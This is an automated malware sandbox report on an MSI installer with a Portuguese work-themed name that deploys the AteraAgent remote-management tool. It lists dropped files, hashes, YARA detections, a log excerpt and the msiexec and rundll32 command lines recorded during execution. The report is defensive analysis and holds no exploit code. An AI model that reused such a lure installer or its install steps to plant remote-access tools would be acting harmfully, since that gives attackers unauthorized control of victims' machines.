                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2804974923941066
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:sOFuFth8FXz/T5bugdfqqmTWSjndddwEqdcrGbQCSsndddwWeUJCQQq:7FBBTVtfqqmqfZcyN1ezQQq
                                                                                                                                                                                                                                        MD5:FB395C3347D7606970E528C3EEA0CC5A
                                                                                                                                                                                                                                        SHA1:0A21FC6DBEB1E603D89361D3DFE0A238929617E1
                                                                                                                                                                                                                                        SHA-256:52D9F28A27B9AC7AF225667C558F9F8EEFAC036FFF6F70503789E3192AF4B942
                                                                                                                                                                                                                                        SHA-512:2618CBACB46696146829065DF2844FAE40D919647220B64437568F2CC140E9BBF9D3A6DF11BA9F9A9807F8A5FFA1ABD4376011C13F13AF7347A2E1B24B5A4276
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2801471122011585
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:rHhwu3th8FXzFT51d/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:rBw3rT5/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:F748ABB85E9F4504D2418E6191C492E0
                                                                                                                                                                                                                                        SHA1:4FB87176D22E34B6B7C3DCD87BB354401F4900C3
                                                                                                                                                                                                                                        SHA-256:4507DF3C9832380F26C91DCBD407F5B514C896A0ADD4E1D1D6E8DBCD4EF791FC
                                                                                                                                                                                                                                        SHA-512:0FE554965514706AFA6FED05164039B0BE3E3CD3B2DEBA0A0879BC98D4C18EA048E3EAE91B3BD246DA41F8CC773A6B5A6AB7E5AB9BE01270132585CD372AA98E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFBA948CC462860B39.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2313338781687264
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4VUuKNveFXJbT5bDSqISoedGPdGTbaStedGPdGTn:0U8DT9DnIDD
                                                                                                                                                                                                                                        MD5:12C2752CCC149703B4DA7D0CCC7F06E0
                                                                                                                                                                                                                                        SHA1:803E4E48D9562440C78E13E20EE40343BB38809B
                                                                                                                                                                                                                                        SHA-256:0D2338B4C0EF396FFB3EB78382D5160E62E96E248707C227367456FFAC74DA3B
                                                                                                                                                                                                                                        SHA-512:63F73A830565398BC05C59EB215C68D98B4E8B7569D6534FDED9657CA4F434D235C9AA58F065E7FA0355633E2241FBEF1E637CF48DBD6FDD73B24D2595CF6F7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFCB414AE811CAE186.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6016796972852392
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:S8PhTuRc06WXz+nT5odfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:9hT1jnT6fqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:6DCE79B8B3C21F74B4479E523BF949F8
                                                                                                                                                                                                                                        SHA1:863E871C321FFFF7511AE01C7DAFC36A2A0A9BE9
                                                                                                                                                                                                                                        SHA-256:03050FF94DEF001CC234B47DB7A07F246D51804C1DB8321EAB039F0E27C6B68F
                                                                                                                                                                                                                                        SHA-512:BE06C0A8839E334902A0FCCAFDCBB0CC72EFCA877F35A39E57C7AF62863232FD296E0A968A9B532587BB43C407CE8DB2239A5F1E9223AEA23968DC5A1EC70CAA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFD433CA0145E2A93A.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5814558018431928
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:W8PhmuRc06WX4wnT556SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:phm1AnTf62SIBvHoYZ
                                                                                                                                                                                                                                        MD5:A46F9A7AF8750EB4C350A1ADD299E2D2
                                                                                                                                                                                                                                        SHA1:EF225989A2D053A399C97A17F290C948C73F4659
                                                                                                                                                                                                                                        SHA-256:E9268BAA413D01BE9227509E0699E46726EE3FEEC07AF22802EBE2C98AB43C5D
                                                                                                                                                                                                                                        SHA-512:9FBDF5EF569DCCFD48AC84DA5C91936149D547A40A7D404846AF2E54571421EA64B1AD6805FD5E1C6DAF98BCA45014064278D44A4685CA2D6EE98B584E11CBE0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFD9D91EC098F6A6B5.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.07983391774199625
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO4yEOjg7SVky6l/X:2F0i8n0itFzDHF2Vt/X
                                                                                                                                                                                                                                        MD5:8EFFECF0F29DB122BC857B544D850D65
                                                                                                                                                                                                                                        SHA1:DE6A8B49C932AA051169EE79D7070F520E4E70BE
                                                                                                                                                                                                                                        SHA-256:57A76199CC984828B15FFAE86BB219DF22ECB3087CAC3BC4ED5FD8F1FC7E81AA
                                                                                                                                                                                                                                        SHA-512:05C0A6D612BABE246412C4FD2A70CCFC9375AE11736461A693561E5E8436B11B13E5D7B20E41E1A8F0E1BAC7576C8A9B2CD925D46FF8672AFA6492ACF6C1C1CD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001188130623557
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GMMXukNveFXJbT5pBDeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:2XeDTnBD7IciuBulU4
                                                                                                                                                                                                                                        MD5:42E81CFC7B310BB55F06B690BE59224B
                                                                                                                                                                                                                                        SHA1:EE6BFEAD13AB267AF5B148D8A6FE9016E55F8C6B
                                                                                                                                                                                                                                        SHA-256:687DE0A4C6FC5714E780AAADFFAE77D0EA91007C27348191B6DE1B9897EC77DD
                                                                                                                                                                                                                                        SHA-512:F4A2FF0246C8CCCF0CDC5C2466C9923F04F0ACCC40585E1103454F4F73B736604719C1984EF443ED84671D78975BE34AA9886AC9F2C205139B8DC6F38DDCBDE4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE2DCB96B45A4216C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6045756871847139
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:C8Ph4uRc06WXzAFT5qd/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:th411FT0/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:DDB86F5B58A205F2D26E2ECDB06069CD
                                                                                                                                                                                                                                        SHA1:AB425904331722C227225F6ACDC23FD657B01F90
                                                                                                                                                                                                                                        SHA-256:B75A8CDEFF4B90500AB54993394B554694F48468B25F78F895AB710649C966BE
                                                                                                                                                                                                                                        SHA-512:17E4B940DCC23C9CC616A0259C7E50726ED126564A55CDB26F188F37013F4DE85885E3E5E914B15E9B1CFC8C3C574607D99E47AD58D3D1989D6A94770FF04EB2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE61BD4C904D39D5F.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.14916427682775762
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:CnjEubmStedGPdGeqISoedGPdGfMKrQPa76SV:ijNyLIBvC76
                                                                                                                                                                                                                                        MD5:ECF49FFC4CD15A17D90E20696F35E86F
                                                                                                                                                                                                                                        SHA1:2D000DA7FD082CA5B0A54A8E69E20B512FC388CE
                                                                                                                                                                                                                                        SHA-256:69195FE06B35713E430496C185AF2B06079E897C6E65AA8B1D51855F57B6121F
                                                                                                                                                                                                                                        SHA-512:D1672CC7B4DD59F6A65F2A8CFBC50F6D56D3B4282E2E8BA5A764C40F48A3844D7FBB887E833A6012AB1EA037CCC5518C38F5B7D46FD92B4BEDD15D41F9F8E165
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE6A2605396FBB224.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2801471122011585
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:rHhwu3th8FXzFT51d/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:rBw3rT5/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:F748ABB85E9F4504D2418E6191C492E0
                                                                                                                                                                                                                                        SHA1:4FB87176D22E34B6B7C3DCD87BB354401F4900C3
                                                                                                                                                                                                                                        SHA-256:4507DF3C9832380F26C91DCBD407F5B514C896A0ADD4E1D1D6E8DBCD4EF791FC
                                                                                                                                                                                                                                        SHA-512:0FE554965514706AFA6FED05164039B0BE3E3CD3B2DEBA0A0879BC98D4C18EA048E3EAE91B3BD246DA41F8CC773A6B5A6AB7E5AB9BE01270132585CD372AA98E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE8E4786049387F04.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.255395292365597
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:n69u5th8FXz/T57dYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:69RBTPn818I3DfNP
                                                                                                                                                                                                                                        MD5:4B6C30E4090CFC782D0CAD9F2CFC6C0E
                                                                                                                                                                                                                                        SHA1:F5CBAB5E2A09E50DBA6188C07818486DF06EDAE1
                                                                                                                                                                                                                                        SHA-256:DCF090068A14B7EECAF69890A43768B522686BD29112217EAB5AFF90D157D617
                                                                                                                                                                                                                                        SHA-512:A6294C4B864351B178BE2AE4CF4A1822C94EF56E97F9722E720B7069A894A2642251D38AF6D7C3BED1450691759539D198D0910FF4DE26602693E168D15E8E1B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFFCBA91410B3A4758.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4019
                                                                                                                                                                                                                                        Entropy (8bit):5.254468395309833
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:W/gDO5ig8O5PgFO5/gYgOVOhVWgBNNXzHSxBNN4zPzRlXNzSPeZgg9dSjedcdS4b:WIkvZY6IH8afhbZh9A6qA4AAADjAN
                                                                                                                                                                                                                                        MD5:4017401B19043652DA66E659D10F50B9
                                                                                                                                                                                                                                        SHA1:5383454BAEEDC7E55D253BC6AFE6E2A80BD9906E
                                                                                                                                                                                                                                        SHA-256:A4F6728F5E2EB8D82463B67093CD2FDF814052C0C24FBE524ADCC0FE0E6B76D2
                                                                                                                                                                                                                                        SHA-512:CA8AE4FDE3D1E19BB3DF93741B5DD48BB2D2887B829538BAC3E6C5A367DFD48953D6DCC808209BD80924028FB294D95179BE18BF81A7F2B1EEB7A8CA4479DFA8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: \Device\ConDrv, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-10-02 11:20:38.4434|ERROR|WindowsWindowedEventLogProvider|Error on retry number 1: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:39.5372|ERROR|WindowsWindowedEventLogProvider|Error on retry number 2: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:41.5684|ERROR|WindowsWindowedEventLogProvider|Error on retry number 3: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:44.5997|ERROR|WindowsWindowedEventLogProvider|Error initializing last processed events, ignoring file, exception: System.IO.FileNotFoundException: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...File name: 'C:\Progr
                                                                                                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Entropy (8bit):7.878684894941199
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Microsoft Windows Installer (60509/1) 57.88%
                                                                                                                                                                                                                                        • ClickyMouse macro set (36024/1) 34.46%
                                                                                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                                                                                                                                                                                                        File name:TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                                                                                                                                                                                                                        File size:2'994'176 bytes
                                                                                                                                                                                                                                        MD5:50159e0e7acfd900e3190f860297d1e6
                                                                                                                                                                                                                                        SHA1:d4f6302266269f2bddfaaa96625dd3d391e11e25
                                                                                                                                                                                                                                        SHA256:9104930a661af5e641ad911fc30c0887433713ea589e389f06cbd5bb0a7ed5ad
                                                                                                                                                                                                                                        SHA512:bdd424b5ddadae02a8a4d16cf67268613544a313c0e33f213b5ba2cf7130504596b9f2092b7c7a6660da7df54f779a8c2b472e243777db5dc34e35eb732a9488
                                                                                                                                                                                                                                        SSDEEP:49152:z+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:z+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        TLSH:B1D523117584483AE37B0A358D7AD6A05E7DFE605B70CA8E9308741E2E705C1AB76F73
                                                                                                                                                                                                                                        Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                                                                                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.


                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:09:57:44
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TRABALHO----PROCESSO0014S55-S440000000S1.msi"
                                                                                                                                                                                                                                        Imagebase:0x7ff65d820000
                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

Target ID:2
Start time:09:57:45
Start date:02/10/2024
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\msiexec.exe /V
Imagebase:0x7ff65d820000
File size:69'632 bytes
MD5 hash:E5DA170027542E25EDE42FC54C929077
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:3
Start time:09:57:45
Start date:02/10/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 460615119F137567DDB08B202FD1B71F
Imagebase:0x330000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:09:57:46
Start date:02/10/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
Imagebase:0xbe0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

